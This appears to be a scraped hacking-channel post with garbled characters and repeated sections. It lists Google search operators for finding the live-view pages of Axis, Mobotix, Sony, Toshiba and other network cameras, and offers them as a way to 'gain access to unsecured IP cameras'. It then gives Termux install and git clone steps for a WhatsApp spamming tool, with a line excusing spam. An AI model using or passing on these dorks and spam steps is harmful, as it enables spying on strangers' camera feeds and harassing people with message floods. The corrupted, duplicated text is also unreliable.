liveapplet
intitle:βlive viewβ intitle:axis
intitle:liveapplet
allintitle:βNetwork Camera NetworkCameraβ
intitle:axis intitle:βvideo serverβ
intitle:liveapplet inurl:LvAppl
intitle:βEvoCamβ inurl:βwebcam.htmlβ
intitle:βLive NetSnap Cam-Server feedβ
intitle:βLive View / - AXISβ
intitle:βLive View / - AXIS 206Mβ
intitle:βLive View / - AXIS 206Wβ
intitle:βLive View / - AXIS 210β³
inurl:indexFrame.shtml Axis
inurl:βMultiCameraFrame?Mode=Motionβ
intitle:start inurl:cgistart
intitle:βWJ-NT104 Main Pageβ
intext:βMOBOTIX M1β³ intext:βOpen Menuβ
intext:βMOBOTIX M10β³ intext:βOpen Menuβ
intext:βMOBOTIX D10β³ intext:βOpen Menuβ
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:βsony network camera snc-p1β³
intitle:βsony network camera snc-m1β³
site:.viewnetcam.com -www.viewnetcam.com
intitle:βToshiba Network Cameraβ user login
intitle:βnetcam live imageβ
intitle:βi-Catcher Console - Web Monitorβ
enjoyβ€οΈππ»
β 2020 git source
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Gain access to unsecured IP cameras with these Google dorks.
β 2020 git source
inurl:/view.shtml
intitle:βLive View / - AXISβ | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:βlive viewβ intitle:axis
intitle:liveapplet
allintitle:βNetwork Camera NetworkCameraβ
intitle:axis intitle:βvideo serverβ
intitle:liveapplet inurl:LvAppl
intitle:βEvoCamβ inurl:βwebcam.htmlβ
intitle:βLive NetSnap Cam-Server feedβ
intitle:βLive View / - AXISβ
intitle:βLive View / - AXIS 206Mβ
intitle:βLive View / - AXIS 206Wβ
intitle:βLive View / - AXIS 210β³
inurl:indexFrame.shtml Axis
inurl:βMultiCameraFrame?Mode=Motionβ
intitle:start inurl:cgistart
intitle:βWJ-NT104 Main Pageβ
intext:βMOBOTIX M1β³ intext:βOpen Menuβ
intext:βMOBOTIX M10β³ intext:βOpen Menuβ
intext:βMOBOTIX D10β³ intext:βOpen Menuβ
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:βsony network camera snc-p1β³
intitle:βsony network camera snc-m1β³
site:.viewnetcam.com -www.viewnetcam.com
intitle:βToshiba Network Cameraβ user login
intitle:βnetcam live imageβ
intitle:βi-Catcher Console - Web Monitorβ
enjoyβ€οΈππ»
β 2020 git source
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Whatsapp Spam via Termux :
> unimited messages- Spam Does Not Make You Hackers, Cyber, Cracker, Anonymous And Minions. Spamming Only For Good Purposes Does Not Violate Religious Law And Rules
#FastTips
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
That's All !
enjoyβ€οΈππ»
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Whatsapp Spam via Termux :
> unimited messages- Spam Does Not Make You Hackers, Cyber, Cracker, Anonymous And Minions. Spamming Only For Good Purposes Does Not Violate Religious Law And Rules
#FastTips
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
$ pkg update upgrade
2οΈβ£$ pkg install git python2 toilet figlet php
3οΈβ£$ git clone https://github.com/4L13199/LITESPAM
4οΈβ£$ cd LITESPAM
use for learnThat's All !
enjoyβ€οΈππ»
β β β Uππ»βΊπ«6π¬πβ β β β